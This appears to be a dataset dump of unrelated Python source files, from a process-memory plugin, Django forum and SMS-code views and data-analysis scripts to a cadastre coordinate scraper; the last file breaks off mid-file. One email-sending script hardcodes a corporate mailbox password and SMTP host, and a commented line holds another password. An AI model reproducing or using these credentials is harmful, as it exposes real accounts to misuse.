text stringlengths 8 6.05M |
|---|
#!/usr/bin/env python
import sys
import psutil
# change the command to match the full path of the executable
command = '/usr/lib/ddb/erts-7.2/bin/beam.smp'
def _bytes_to_mb(num):
return round(float(num) / 1024 / 1024, 2)
def _bytes_to_gb(num):
return round(float(num) / 1024 / 1024 / 1024, 2)
try:
perf_data = {}
for p in psutil.process_iter():
if command in p.cmdline():
mem_info_ex = p.memory_info_ex()
perf_data['rss'] = mem_info_ex.rss
perf_data['rss_mb'] = _bytes_to_mb(mem_info_ex.rss)
perf_data['rss_gb'] = _bytes_to_gb(mem_info_ex.rss)
perf_data['vms'] = mem_info_ex.vms
perf_data['vms_mb'] = _bytes_to_mb(mem_info_ex.vms)
perf_data['vms_gb'] = _bytes_to_gb(mem_info_ex.vms)
perf_data['shared'] = mem_info_ex.shared
perf_data['shared_mb'] = _bytes_to_mb(mem_info_ex.shared)
perf_data['shared_gb'] = _bytes_to_gb(mem_info_ex.shared)
perf_data['text'] = mem_info_ex.text
perf_data['lib'] = mem_info_ex.lib
perf_data['data'] = mem_info_ex.data
perf_data['dirty'] = mem_info_ex.data
output = "OK | "
for k, v in perf_data.iteritems():
output += "%s=%s;;;; " % (k.lower(), v)
print output
sys.exit(0)
except Exception, e:
print "Plugin Failed!: %s" % e
sys.exit(2) |
#!/usr/bin/env python
import sys
InFileName = sys.argv[1] # alignment file
OutFileName = sys.argv[2] # in group FASTA file
OutFile2Name = sys.argv[3] # out group FASTA file
numSeqs = int(sys.argv[4]) # total number of sequences
outGroup = int(sys.argv[5]) # location of the outgroup sequence
InFile = open(InFileName, 'r')
OutFile = open(OutFileName, 'w')
OutFile2 = open(OutFile2Name, 'w')
rowCounter = 0
inData = []
seqNames = []
lineNum = 0
for i in range(numSeqs + 2) :
inData.append([])
for line in InFile :
row = rowCounter % (numSeqs + 2)
if (lineNum <= numSeqs) :
line = line.strip()
name = line[0:9]
seq = line[10:]
seqNames.append(name)
inData[row].append(seq)
lineNum = lineNum + 1
else :
line = line.strip()
inData[row].append(line)
rowCounter = rowCounter + 1
print(seqNames)
for i in range(1, numSeqs) :
if (i == outGroup) :
OutFile2.write(">" + seqNames[i] + "\n")
for line in inData[i] :
OutFile2.write(line + '\n')
else :
OutFile.write(">" + seqNames[i] + "\n")
for line in inData[i] :
OutFile.write(line + '\n')
OutFile.write('\n')
|
#_*_coding:utf-8_*_
import logging,json,os
from django.http import Http404
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import (require_POST,require_GET)
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect,HttpResponse
from django.shortcuts import render
from apps.kx.models import KxUserlogin
from django.conf import settings
from pprint import pprint
from datetime import datetime
from models import ForumPost,ForumComment
from forms import ForumPostForm,ForumCommentForm
logger = logging.getLogger(__name__)
def index(request):
data = []
posts =ForumPost.objects.all().order_by('-created')
for i in posts:
comment = ForumComment.objects.filter(fid__exact=i).count()
vote = i.vote_up-i.vote_down
data.append((i, comment,vote))
return render(request,"forum/index.html",{"posts":data})
@require_POST
@login_required(redirect_field_name='forum_index')
def add(request):
print request.path
form = ForumPostForm(request.POST)
if form.is_valid():
f = form.save(commit=False)
f.user_id=request.user.pk
f.ip = request.META.get('REMOTE_ADDR','')
f.save()
return HttpResponseRedirect(reverse('forum_index'))
@require_POST
@login_required(redirect_field_name="forum_add")
#@login_required()
def reply(request):
form = ForumCommentForm(request.POST)
if form.is_valid():
fid =form.cleaned_data['fid']
f = form.save(commit=False)
f.user_id=request.user.pk
f.ip = request.META.get('REMOTE_ADDR','')
f.save()
return HttpResponseRedirect('post/'+str(fid)+'/')
@require_GET
def post(request,pid):
post = ForumPost.objects.select_related().get(pk=pid)
vote = post.vote_up - post.vote_down
comments = post.forumcomment_set.all()
return render(request,"forum/detail.html",{"post":post,"vote":vote,"comments":comments})
@login_required()
@require_POST
def vote(request):
message = {}
pid = request.POST.get("id","")
v = request.POST.get("v","")
try:
p = ForumPost.objects.get(pk=pid)
if v == '0':
vote = p.vote_up + 1
ForumPost.objects.filter(pk=pid).update(vote_up=vote)
elif '1'== v:
vote = p.vote_down + 1
ForumPost.objects.filter(pk=pid).update(vote_down=vote)
message['status']=1
message['info']="投票成功!"
message['data']=0
except Exception as e:
logger.debug("vote:%s",e)
message['status']=0
message['info']="投票失败!"
message['data']=0
return HttpResponse(json.dumps(message),content_type="application/json")
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.apps import AppConfig
class GrupoConfig(AppConfig):
name = 'Grupo'
|
s=input()
if(len(s.split('.'))==2):
a,b=s.split('.')
x,y=b.split(' ')
c=len(x)
if(a!='0'):
d=int(a+x)**int(y)
print(str(d)[:-c*int(y)]+'.'+str(d)[-c*int(y):])
else:
d=str(int(x)**int(y))
while len(d)<c*int(y): d='0'+d
print("0."+d)
else:
p,q=map(int,s.split(' '))
print(p**q)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import io, sys
from argparse import ArgumentParser
#this script takes a text file with tab delimited columns
#and adds every column except the first line-wise to the target file.
#Both files should ideally have the same number of lines.
#The script will terminate once either file ends.
# For example:
# Appended file:
# Computer Nom.Sg.Masc
#
# Target file:
# Computer NN Computer
#
# becomes
#
# Computer NN Computer Nom.Sg.Masc
#
# usage:
# append_column.py [OPTIONS] <APPEND_COLS_FILE> <TARGET_FILE>
#
# Options and arguments:
#
# -h Print this message and quit
#
#
# example:
# append_column.py morph.tab tagged.tab > merged.tab
# etc.
PY3 = sys.version_info[0] == 3
def inject_col(source_lines, target_lines, col=-1, into_col=None, skip_supertoks=False):
output = []
counter = -1
target_line = ""
if not PY3:
if isinstance(target_lines,unicode):
target_lines = str(target_lines.encode("utf8"))
if not isinstance(source_lines,list):
source_lines = source_lines.split("\n")
if not isinstance(target_lines,list):
target_lines = target_lines.split("\n")
if col != -1:
# non-final column requested, ensure source_lines only has lines with tabs
source_lines = [l for l in source_lines if "\t" in l]
for i, source_line in enumerate(source_lines):
while len(target_line) == 0:
counter +=1
target_line = target_lines[counter]
if (target_line.startswith("<") and target_line.endswith(">")) or len(target_line) == 0:
output.append(target_line)
target_line = ""
else:
target_cols = target_line.split("\t")
if "-" in target_cols[0] and skip_supertoks:
output.append(target_line)
target_line = ""
source_cols = source_line.split("\t")
to_inject = source_cols[col]
target_cols = target_line.split("\t")
if into_col is None:
target_cols.append(to_inject)
else:
target_cols[into_col] = to_inject
output.append("\t".join(target_cols))
target_line=""
return "\n".join(output)
if __name__ == "__main__":
p = ArgumentParser()
p.add_argument("source")
p.add_argument("target")
p.add_argument("-c","--col",action="store",default="-1")
opts = p.parse_args()
source_lines = io.open(opts.file1,encoding="utf8").read().replace("\r","").split("\n")
target_lines = io.open(opts.file1,encoding="utf8").read().replace("\r","").split("\n")
merged = inject_col(source_lines,target_lines,opts.col)
print(merged)
|
from distutils.core import setup, Extension
from Cython.Build import cythonize
import numpy
ext = Extension("GMMModel",
sources=["GMMModel.pyx"],
extra_objects = ['../slgr_engine/slgr_lib.a'],
language="c++"
,include_dirs = ['../slgr_engine/',numpy.get_include()]
,extra_compile_args = ["-std=c++0x","-fpermissive"]
,extra_link_args = ['-lfftw3','-lstdc++']
)
setup(name="GMMModel",
ext_modules=cythonize(ext))
|
from django.contrib import admin
from . import models
admin.site.register(models.RelatedResource1)
admin.site.register(models.RelatedResource2)
admin.site.register(models.TestResource)
|
# -*- coding: utf-8 -*-
import os
import datetime
import sys
import pandas as pd
from time import localtime, strftime
from collections import OrderedDict
from konlpy.tag import Twitter
from apyori import apriori
DATADIR = 'C:/Users/planit/Desktop/bigdata/'
NEWFILE = ''
def read_newfile():
dir = DATADIR
files = os.listdir(dir)
# listdir() 해당 경로의 파일을 리스트로 반환
# 파일의 수정시간을 타임스탬프로 출력한 후 내림차순으로 정렬하였다.
for i in range(0, len(files)):
for j in range(0, len(files)):
if datetime.datetime.fromtimestamp(os.path.getmtime(dir + files[i])) > \
datetime.datetime.fromtimestamp(os.path.getmtime(dir + files[j])):
(files[i], files[j]) = (files[j], files[i])
print(files[0])
NEWFILE = 'article.xlsx'
return NEWFILE
def pretreatment_content(filname):
PATH = DATADIR + filname
result = {}
ori_data = pd.read_excel(PATH, sheet_name='Sheet1')
temp_data = ori_data[['years', 'title', 'contents']]
temp_data = temp_data.drop_duplicates(subset=['title', 'contents'], keep='last')
titles_dict = temp_data.groupby('years')['title'].apply(lambda grp : list(grp.value_counts().index)).to_dict()
contents_dict = temp_data.groupby('years')['contents'].apply(lambda grp: list(grp.value_counts().index)).to_dict()
#contents_dict = temp_data.groupby('years')["contents"].apply(lambda x: x.tolist())
twitter = Twitter()
for date in titles_dict.keys():
titles_dict[date] = twitter.nouns(str(titles_dict[date]))
return titles_dict
#print(titles_dict.values())
# for date in contents_dict.keys():
# contents_dict[date] = twitter.nouns(str(contents_dict[date]))
# return contents_dict
# print(contents_dict.values())
# for name_of_the_group, group in titles:
# print(name_of_the_group)
# print(group)
# for index, row in temp_data.iterrows():
# compare_result[ori_data['years'][index]] = twitter.nouns(ori_data['title'][index])
# compare_result[ori_data['years'][index]] = twitter.nouns(ori_data['contents'][index])
# print(compare_result)
def main():
excel = read_newfile()
stdata = pretreatment_content(excel) #단어 분석 데이터 가져오기
stdataval = list(stdata.values())
store_data = pd.read_csv('C:\\Users\\planit\\Desktop\\bigdata\\stock2.csv') #주식데이터
temp = [] #날짜, 가중치만 가지고 있음
for i in range(76):
if store_data.values[i][3] > 0 :
temp.append([store_data.values[i][1],'1'])
elif int(store_data.values[i][3]) == 0 :
temp.append([store_data.values[i][1],'0'])
elif int(store_data.values[i][3]) < 0 :
temp.append([store_data.values[i][1],'-1']) #[['2019-02-12-', '1'], ['2019-02-13-', '-1'], ['2019-02-14-', '-1'], ['2019-02-15-', '1'], ['2019-02-18-', '1'], ['2019-02-19-', '1'], ['2019-02-20-', '-1']
temp2 = {} #날짜별 단어 가중치값 가지 데이터(차후 apriori 적용해볼 데이터 셋)
for i in range(len(temp)): #전처리 과정 #둘이 겹치는 데이터만 가져오기 # 주식
if temp[i][0] in stdata: #단어
stdataval[i].append(temp[i][1])
temp2[temp[i][0]] = stdataval[i] #{날짜 : 단어, 가중치}
print(temp2) # {'2019-02-12-': ['절반', '이상', '북한', '협력', '대상', '명', '비교', '1'], '2019-02-21-': ['당국자', '북한', '주장', '말장난', '사흘', '장외', '공방전', '트럼프', '북한', '요구', '과장', '이번', '북한', '말', '-1'],
apriorival = list(temp2.values())
association_rules = apriori(apriorival, min_support=0.1, min_confidence=0.4) #10시 32분
association_results = list(association_rules)
print(len(association_results))
for ar in association_results:
print(ar)
main() |
from typing import List, Tuple, Optional
from flask import Blueprint, render_template
from models import Venue, Contest
VENUE_MOD = Blueprint('venue_mod', __name__)
@VENUE_MOD.route('/')
def all_venues() -> str:
breadcrumb = [
{'path': '/', 'name': '首頁'},
{'name': '場地'}
]
venues = Venue.query.all()
for venue in venues:
venue.contest_count = Contest.query.filter_by(venue_id=venue.id).count()
search_fields = ['venue-name', 'venue-location']
shortcut_options: List[str] = [] # ['北區', '中區', '南區', '海外']
search_hint = '場地名稱 / 城市'
return render_template(
'venues.html',
search_fields=search_fields,
shortcut_options=shortcut_options,
search_hint=search_hint,
ascending=True,
breadcrumb=breadcrumb,
venues=venues)
@VENUE_MOD.route('/<venue_id>')
def get_venue_detail(venue_id: str) -> Tuple[str, Optional[int]]:
if not venue_id.isdigit():
return render_template(
'error.html',
title='Invalid venue ID',
reason=f'[{venue_id}] is not a valid format.'), 400
venue = Venue.query.filter_by(id=venue_id).first()
contest_record = Contest.query.filter_by(venue_id=venue_id).all()
breadcrumb = [
{'path': '/', 'name': '首頁'},
{'path': '/venue/', 'name': '場地'},
{'name': venue.name}
]
return render_template(
'venue.html',
ascending=False,
breadcrumb=breadcrumb,
venue=venue,
contests=contest_record)
|
import turtle as trtl
# ----- maze and turtle config variables
screen_h = 400
screen_w = 420
startx = -100
starty = -100
turtle_scale = 1.5
# ------ robot commands
def move(times: int = 1):
i = 0
while i < times:
robot.dot(10)
robot.fd(50)
i += 1
def turn_left(times: int = 1):
i = 0
while i < times:
robot.speed(0)
robot.lt(90)
robot.speed(2)
i += 1
def turn_right(times: int = 1):
j = 0
i = 0
while j < times:
while i < 3:
turn_left()
i += 1
j += 1
# ----- init screen
wn = trtl.Screen()
wn.setup(width=screen_w, height=screen_h)
robot_image = "robot.gif"
wn.addshape(robot_image)
# ----- init robot
robot = trtl.Turtle(shape=robot_image)
robot.hideturtle()
robot.color("darkorchid")
robot.pencolor("darkorchid")
robot.penup()
robot.setheading(90)
robot.turtlesize(turtle_scale, turtle_scale)
robot.goto(startx, starty)
robot.speed(2)
robot.showturtle()
wn.bgpic("maze3.png") # other file names should be maze2.png, maze3.png
move()
turn_right()
move(2)
turn_left()
move(2)
turn_right()
move(2)
turn_left()
move()
wn.mainloop()
|
from django.http import HttpResponse
from django.shortcuts import render
# Create your views here.
from rest_framework.views import APIView
from rest_framework.response import Response
from libs.captcha.captcha import captcha
from django_redis import get_redis_connection
from libs.yuntongxun.sms import CCP
from users.utils import check_access_token_to_mobile
from verifications.serializers import RegisterSmsSerializer
import random
from celery_tasks.sms.tasks import send_sms_code
# 图片验证码
class RegisterImageCodeAPI(APIView):
def get(self,request,image_code_id):
# 1.接收uuid
# 2.生成验证码
text,image = captcha.generate_captcha()
print(text)
# 3.将验证码保存在redis中
redis_conn = get_redis_connection('code')
redis_conn.setex('img'+image_code_id,300,text)
# 4.返回验证码
return HttpResponse(image,content_type='image/jpeg')
# 手机验证码
class RegisterSmsCodeAPI(APIView):
def get(self,request,mobile=None):
# 1.接收数据
query_params = request.query_params
# 2.校验数据
serializer = RegisterSmsSerializer(data=query_params)
# 3.生成短信验证码
sms_code = '%06d' % random.randint(0,999999)
print(sms_code)
if mobile is None:
access_token = request.query_params['access_token']
mobile = check_access_token_to_mobile(access_token)
# 4.发送短信
CCP().send_template_sms(mobile, [sms_code, 5], 1)
# send_sms_code.delay(mobile,sms_code)
# 5.保存短信
redis_conn = get_redis_connection('code')
redis_conn.setex('sms_'+mobile,5*60,sms_code)
return Response({'msg':'ok'})
|
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 2 08:42:48 2021
@author: Jose Luis Robledo
Comprensión de listas
Es un tipo de construcción que consta de una expresión que determina cómo
modificar los elementos de una lista, seguida de una o varias clausulas for y,
opcionalmente, una o varias clausulas if.
El resultado que se obtiene es una lista.
"""
lista = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
# Cada elemento de la lista se eleva al cubo
cubos = [valor ** 3 for valor in lista]
print('Cubos de 1 a 10:', cubos)
x= (1, 3, 4)
y=1
z=3
variable = lambda x,y,z: x[2] if x[0]==y and x[1]==z else 0
print(variable(x,y,z))
numeros = [135, 154, 180, 193, 210]
divisiblespor3 = [valor for valor in numeros if valor % 3.0 == 0]
div3Lambda = list(filter(lambda x : x%3 == 0, numeros))
print(divisiblespor3)
print(div3Lambda)
# Muestra lista con los números divisibles por 3
print(divisiblespor3)
# Define función devuelve el inverso de un número
def funcion(x):
return 1/x
inv=lambda x:1/x
lista2 = [1, 2, 3] # declara lista
# Muestra lista con inversos de cada número
print([funcion(index) for index in lista2])
print([inv(elemento) for elemento in lista2])
resultado = lambda x:[1/x for x in lista2]
print(resultado)
lis=[1,2,3]
lis2=[4,5,6]
lista=[(1,2), (1,2), (1,2), (1,2)]
comprension = lambda lista: [[x] for x in lista]
print(comprension) |
"""
#------------------------------------------------------------------------------
# Create ZV-IC Shaper
#
# This script will take a generalized input from an undamped second order system subject
# to nonzero initial conditions and solve the minimum-time ZV shaper using optimization
#
# Created: 6/20/17 - Daniel Newman -- dmn3669@louisiana.edu
#
# Modified:
# * 6/20/17 - DMN -- dmn3669@louisiana.edu
# - Added documentation for this script
#------------------------------------------------------------------------------
"""
# Ignore user warnings to keep the terminal clean
import warnings
warnings.simplefilter("ignore", UserWarning)
# Import the necessary python library modules
import numpy as np
from scipy.signal import lsim
from scipy.special import gamma
import os
import sys
import pdb
# Add my local path to the relevant modules list
sys.path.append('/Users/Daniel/Github/Crawlab-Student-Code/Daniel Newman/Python Modules')
# Import my python modules
import InputShaping as shaping
import Generate_Plots as genplt
import twomass
import onemass
folder = 'Figures/{}/'.format(
sys.argv[0],
)
# x: array([ 0.2648, 0.7723, 0.2277, 0.0144, 0.0076])
dt = 0.01
t = np.arange(0,10,dt)
k = (2 * np.pi)**2
c = 0.0
k_p = 40
k_d = 15
a_1 = 0.5044
t_shaper = 1.5
m_1 = 1
m_2 = 1
x1_init = 0.
x1_dot_init = 0.
x2_init = 0.
x2_dot_init = 0.
StartTime = 0.0
X0 = [x1_init,x1_dot_init,x2_init,x2_dot_init]
X0_onemass = [x1_init,x1_dot_init]
Distance = 0.
Amax = 50.
Vmax = 2.
omega_n = np.sqrt(c *(m_1 + m_2) / (2 * m_1 * m_2) \
- np.sqrt(m_1 + m_2) / (2 * m_1 * m_2) * np.sqrt(c**2 * m_1 + c**2 * m_2 + 4 * k * m_1 * m_2* 1j * 1j)).real
zeta_n = c / (m_2 * 2 * omega_n)
omega_n = omega_n * np.sqrt(1 - (zeta_n)**2)
# The InputShaping module does a Hertz to Radians conversion.
omega_n_hz = omega_n / (2 * np.pi) # Hz
tau = 2*np.pi / omega_n
a_1 = 0.5
a_2 = 1 - a_1
t_shaper = shaping.ZV(1.67 / (2 * np.pi),c / (m_2 * omega_n)).duration
shaper = np.array([[0,0.6371],[0.7479,1 - 0.6371]])
def actuator_effort(response,shaper):
shaped_pos = shaping.shaped_input(shaping.step_input,t,shaper,Distance)
actuator_effort = (k_d * -response[:,1] + k_p * (shaped_pos - response[:,0])) / m_1
return actuator_effort
p = [[Amax,Vmax], m_1, m_2, c, k, StartTime, k_d, k_p, dt, t, X0, Distance]
disturbance = shaping.pulse(t,20,0.5,1)
m2_response,sys_input = twomass.response(p,'Unshaped',m2_disturbance=disturbance)
m1_response,sys_input = twomass.response(p,'Unshaped',m1_disturbance=disturbance)
genplt.compare_responses(t,
m2_response[:,2],'Unshaped',
m1_response[:,2],'Unshaped',
#disturbance,'Disturbance',
name_append='Response',
xlabel='Time (s)',ylabel='Position (m)',
folder=folder,grid=False,save_data=False,ncol=2,legend_loc='top',ymax=0.1
)
|
import os
import re
import cv2
import pickle
import argparse
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from helper import save_obj
from pose_block import initial_pose_estimation
from create_renderings import create_refinement_inputs
from pose_refinement import train_pose_refinement
from correspondence_block import train_correspondence_block
from create_ground_truth import create_GT_masks, create_UV_XYZ_dictionary, dataset_dir_structure
parser = argparse.ArgumentParser(
description='Script to create the Ground Truth masks')
parser.add_argument("--root_dir", default="BinMOD_Dataset/",
help="path to dataset directory")
parser.add_argument("--bgd_dir", default="val2017/",
help="path to background images dataset directory")
parser.add_argument("--split", default=0.85, help="train:test split ratio")
args = parser.parse_args()
root_dir = args.root_dir
background_dir = args.bgd_dir
list_all_images = []
for root, dirs, files in os.walk(root_dir):
for file in files:
if file.endswith(".jpg"): # images that exist
list_all_images.append(os.path.join(root, file))
num_images = len(list_all_images)
indices = list(range(num_images))
np.random.seed(69)
np.random.shuffle(indices)
split = int(np.floor(args.split * num_images))
train_idx, test_idx = indices[:split], indices[split:]
print("Total number of images: ", num_images)
print(" Total number of training images: ", len(train_idx))
print(" Total number of testing images: ", len(test_idx))
save_obj(list_all_images, root_dir + "all_images_adr")
save_obj(train_idx, root_dir + "train_images_indices")
save_obj(test_idx, root_dir + "test_images_indices")
dataset_dir_structure(root_dir)
# Intrinsic Parameters of the Camera
fx = 2300/3.2
px = 1032/3.2
fy = 2300/3.2
py = 772/3.2
intrinsic_matrix = np.array([[fx, 0, px], [0, fy, py], [0, 0, 1]])
classes = {'ape': 1, 'benchviseblue': 2, 'cam': 3, 'can': 4, 'cat': 5, 'driller': 6,
'duck': 7, 'eggbox': 8, 'glue': 9, 'holepuncher': 10, 'iron': 11, 'lamp': 12, 'phone': 13}
classes = {'bin': 1}
print("------ Start creating ground truth ------")
#create_GT_masks(root_dir, background_dir, intrinsic_matrix, classes)
#create_UV_XYZ_dictionary(root_dir) # create UV - XYZ dictionaries
print("----- Finished creating ground truth -----")
print("------ Started training of the correspondence block ------")
#train_correspondence_block(root_dir, classes, epochs=40)
print("------ Training Finished ------")
print("------ Started Initial pose estimation ------")
initial_pose_estimation(root_dir, classes, intrinsic_matrix)
print("------ Finished Initial pose estimation -----")
print("----- Started creating inputs for DL based pose refinement ------")
#create_refinement_inputs(root_dir, classes, intrinsic_matrix)
print("----- Finished creating inputs for DL based pose refinement")
print("----- Started training DL based pose refiner ------")
#train_pose_refinement(root_dir, classes, epochs=10)
print("----- Finished training DL based pose refiner ------")
|
from . import *
from sqlalchemy.orm import column_property
class Artist(Base):
__tablename__ = 'artist'
id = Column(Integer, primary_key=True)
name = Column(String(255))
prefix = Column(String(32))
Index(name)
Index(prefix)
__table_args__ = {'mysql_engine':'MyISAM'}
def __str__(self):
return u'<a href="/artist/?id={}">{}</a>'.format(self.id, self.fullname)
@property
def new_link(self):
return u'<a href="/artist/new/{}">{}</a>'.format(self.id, self.fullname)
def get_url(self):
return "/artist/{}".format(self.id)
@hybrid_property
def fullname(self):
if self.prefix is None:
return self.name
else:
return self.prefix + " " + self.name
@fullname.expression
def fullname(self):
return func.concat_ws(" ", self.prefix, self.name)
Artist.fullname_url = column_property(func.concat('<a href="/artist/?id=', Artist.id, '">', Artist.fullname, '</a>'))
|
from tkinter import *
import smtplib
import email.mime.multipart
from email.mime.text import MIMEText
import xlrd
import win32ui
def sendmail():
#登陆邮箱
head=t4.get()
subject=t5.get()
fmail='changnl@chinaunicom.cn'
psd='CNLcw198608'
smtp=smtplib
smtp=smtplib.SMTP()
smtp.connect('10.11.158.13','25')
smtp.starttls()
#smtp.login('lixf311@chinaunicom.cn','2676518aA')
smtp.login(fmail,psd)
#print (head)
#print (subject)
#读取表格sheet1
#path=input('输入邮件明细地址')
#book=xlrd.open_workbook(r"d:\201601.xlsx")
book=xlrd.open_workbook(path)
sh = book.sheet_by_index(0)
cx=sh.ncols-1
#编辑邮件
#msg=email.mime.multipart.MIMEMultipart()
#head=input('输入邮件头部内容')
#subject=input('输入邮件的主题')
L= range(sh.nrows)
for rx in L[1:]:
mail=sh.cell_value(rx,cx)
html='<html><table border="1" ><P>'+head+'</p><tr>'
for cl in range(sh.ncols-1):
html=html+'<td>'+str(sh.cell_value(0,cl))+'</td>'
html=html+'</tr><tr>'
for dl in range(sh.ncols-1):
if type(sh.cell_value(rx,dl))==float :
html=html+'<td>'+str(round(sh.cell_value(rx,dl),2))+'</td>'
else :
html=html+'<td>'+str(sh.cell_value(rx,dl))+'</td>'
html=html+'</tr></table></html>'
msg = MIMEText(html,'html','utf-8')
msg['from']=fmail
msg['to']=mail
#msg['subject']='测试工资条'
msg['subject']=subject
smtp.sendmail(fmail,mail,msg.as_string())
print (mail,'邮件发送成功')
#print (html)
smtp.quit()
def openfile():
dlg = win32ui.CreateFileDialog(1) # 1表示打开文件对话框
dlg.SetOFNInitialDir('C:/') # 设置打开文件对话框中的初始显示目录
dlg.DoModal()
filename = dlg.GetPathName() # 获取选择的文件名称
return filename
root=Tk()
Label(root,text='输入发送邮箱',width=50).pack()
t1=StringVar()
e1 = Entry(root,textvariable = t1,width=45)
e1.pack()
Label(root,text='输入邮箱密码',width=50).pack()
t2=StringVar()
e2 = Entry(root,textvariable = t2,width=45,show='*')
e2.pack()
Label(root,text='execl文件',width=50).pack()
#Button(root,text='打开文件',command=openfile,width=10,height=2).pack()
#t3=StringVar()
t3=openfile()
e3 = Label(root,text =t3,width=45)
#t3=openfile()
e3.pack()
path=t3
Label(root,text='输入邮件头部文字内容',width=50).pack()
t4=StringVar()
e4 = Entry(root,textvariable = t4,width=45)
#t4.set('输入邮件头部文字内容')
e4.pack()
head=t4.get()
Label(root,text='输入邮件的主题',width=50).pack()
t5=StringVar()
e5 = Entry(root,textvariable = t5,width=45)
#t5.set('输入邮件的主题')
e5.pack()
subject=t5.get()
Button(root,text='发送邮件',command=sendmail,width=10,height=2).pack()
mainloop() |
#快速排序
# 思路与答案基本一致,答案的写法更加简洁,python语音用的更加灵活
def quick_sort_result(array):
if (len(array) <2):
return array
else:
pivot = array[0]
less = [i for i in array[1:] if i<= pivot]
greater = [i for i in array[1:] if i> pivot]
return quicksort(less) + [pivot] + quick_sort_result(greater)
def quick_sort_xsj(list):
if(list == []):
return []
else:
base = list[0]
A = []
B = []
for i in list[1:]:
if (i>= base):
B.append(i)
else:
A.append(i)
C = quick_sort_xsj(A)
D = quick_sort_xsj(B)
C.append(base)
return C +D
s = [1,4,2,5,5,6,4,6,7,8,10,20]
print(quick_sort_xsj(s))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import time
import urllib.error
import random
from time import sleep
from src.librecatastro.domain.geometry.geo_polygon import GeoPolygon
from src.librecatastro.scrapping.searcher import Searcher
from src.settings import config
from src.utils.catastro_logger import CadastroLogger
from src.utils.list_utils import ListUtils
'''Logger'''
logger = CadastroLogger(__name__).logger
class CoordinatesSearcher(Searcher):
"""
Class that inheritates from Searcher Abstract Class and implements
functions regarding coordinates search.
"""
def __init__(self):
super().__init__()
@classmethod
def search_by_coordinates(cls, scrapper, filenames, pictures=False):
"""
Function that searches Cadastro (HTML or XML) by coordinates
:param scrapper: HTMLScrapper or XMLScrapper classes
:param filenames: Names of the filenames with coordinates to scrap
:param pictures: Do we want to scrap house plan pictures?
"""
for r, d, files in os.walk(config['coordinates_path']):
for file in files:
if len(filenames) > 0 and file not in filenames:
continue
if '.json' not in file:
continue
try:
polygon = GeoPolygon(os.path.join(config['coordinates_path'], file))
CoordinatesSearcher.search_in_polygon(scrapper, polygon, pictures)
except:
logger.error("{} is not formatted properly. Please take a look at the examples.".format(file))
@classmethod
def search_in_polygon(cls, scrapper, polygon, pictures=False):
"""
Function that searchs by coordinates strictly inside a Polygon
defined by the user.
:param scrapper: HTMLScrapper or XMLScrapper classes
:param polygon: a GeoPolygon class object
:param pictures: Do we want to scrap house plan pictures?
"""
bb = polygon.get_bounding_box()
lon_min = int(bb[0] * config['scale'])
lon_max = int(bb[2] * config['scale'])
lat_min = int(bb[1] * config['scale'])
lat_max = int(bb[3] * config['scale'])
for x in range(lon_min, lon_max):
for y in range(lat_min, lat_max):
x_scaled = x / config['scale']
y_scaled = y / config['scale']
if not polygon.is_point_in_polygon(x_scaled, y_scaled):
continue
''' Adding to tracking file'''
logger.info('{},{}'.format(x_scaled, y_scaled))
try:
scrapper.process_search_by_coordinates(x_scaled, y_scaled, pictures)
except urllib.error.HTTPError as e:
logger.error("ERROR AT LONGITUDE {} LATITUDE {}".format(x_scaled, y_scaled))
logger.error("=============================================")
logger.error(e, exc_info=True)
logger.error("...sleeping due to connection reset...")
logger.debug("...sleeping due to connection reset...")
logger.error("=============================================")
''' Could be a service Unavailable or denegation of service'''
sleep(config['sleep_dos_time'])
except Exception as e:
logger.error("ERROR AT LONGITUDE {} LATITUDE {}".format(x_scaled, y_scaled))
logger.error("=============================================")
logger.error(e, exc_info=True)
logger.error("=============================================")
sleep(config['sleep_time'])
@staticmethod
def search_by_coordinates_max_time(seconds, lon_min, lon_max, lat_min, lat_max, scrapper):
"""
Function that allows searching in lon, lat for a maximum number of seconds.
Mainly used for debugging purposes.
:param seconds: Total of seconds to scrap
:param lon_min: Minimum longitude
:param lon_max: Maximum longitude
:param lat_min: Minimum latitude
:param lat_max: Maximum latitude
:param scrapper: HTML or XML Scrapper
:return: a List of CadasterEntry objects
"""
start_time = time.time()
results = []
finished = False
for x in range(lon_min, lon_max):
for y in range(lat_min, lat_max):
x_scaled = x / config['scale']
y_scaled = y / config['scale']
try:
result = scrapper.process_search_by_coordinates(x_scaled, y_scaled)
if result is not None:
results.append(result)
now = time.time()
elapsed_time = now - start_time
if elapsed_time > seconds:
finished = True
break
except urllib.error.HTTPError as e:
logger.error("ERROR AT LONGITUDE {} LATITUDE {}".format(x_scaled, y_scaled))
logger.error("=============================================")
logger.error(e, exc_info=True)
logger.error("=============================================")
''' Could be a service Unavailable or denegation of service'''
sleep(config['sleep_dos_time'])
except Exception as e:
logger.error("ERROR AT LONGITUDE {} LATITUDE {}".format(x_scaled, y_scaled))
logger.error("=============================================")
logger.error(e, exc_info=True)
logger.error("=============================================")
sleep(config['sleep_time'])
if finished:
break
return ListUtils.flat(results)
@staticmethod
def search_by_coordinates_linear_max_n_matches(matches, lon_min, lon_max, lat_min, lat_max, scrapper):
"""
Function that allows searching in lon, lat for a maximum number of matches.
Mainly used for debugging purposes.
:param matches: Total of matches to scrap
:param lon_min: Minimum longitude
:param lon_max: Maximum longitude
:param lat_min: Minimum latitude
:param lat_max: Maximum latitude
:param scrapper: HTML or XML Scrapper
:return: a List of CadasterEntry objects
"""
results = []
counter = matches
finished = False
for x in range(lon_min, lon_max):
for y in range(lat_min, lat_max):
x_scaled = x / config['scale']
y_scaled = y / config['scale']
try:
result = scrapper.process_search_by_coordinates(x_scaled, y_scaled)
if result is not None:
results.append(result)
counter -= 1
if counter == 0:
finished = True
break
except urllib.error.HTTPError as e:
logger.error("ERROR AT LONGITUDE {} LATITUDE {}".format(x_scaled, y_scaled))
logger.error("=============================================")
logger.error(e, exc_info=True)
logger.error("=============================================")
''' Could be a service Unavailable or denegation of service'''
sleep(config['sleep_dos_time'])
except Exception as e:
logger.error("ERROR AT LONGITUDE {} LATITUDE {}".format(x_scaled, y_scaled))
logger.error("=============================================")
logger.error(e, exc_info=True)
logger.error("=============================================")
sleep(config['sleep_time'])
if finished:
break
return ListUtils.flat(results)
@staticmethod
